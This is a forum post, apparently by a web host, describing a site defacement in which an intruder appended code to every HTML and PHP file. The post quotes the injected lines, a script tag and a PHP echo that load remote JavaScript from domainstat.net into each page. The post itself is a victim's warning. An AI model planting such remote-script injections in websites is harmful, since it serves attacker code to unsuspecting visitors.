One site that i'm hosting got defaced today. I haven't found out yet how the intruder got in. I can only guess it's from older/unupdated scripts or programs.
Anyway, the intruder changed the front page (which is easy to fix), and edited every single html and .php files (which will take hours to fix).
The following code is added to the end of every .html files:
And the following code is added to the end of every .php files:
Unfortunately the website is a pretty large one. I spent 5 hours already checking hundreds of files and upgrading a few softwares, and still got more to go. Hope no one else gets hit...
PS: I already deleted the defaced index and forgot to save a copy, so I can't say who/which group did it.
Anyway, the intruder changed the front page (which is easy to fix), and edited every single html and .php files (which will take hours to fix).
The following code is added to the end of every .html files:
Code:
<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>
Code:
<? if (!defined('domainstat')) { define("domainstat", "ok"); echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>";}?>
PS: I already deleted the defaced index and forgot to save a copy, so I can't say who/which group did it.
Comment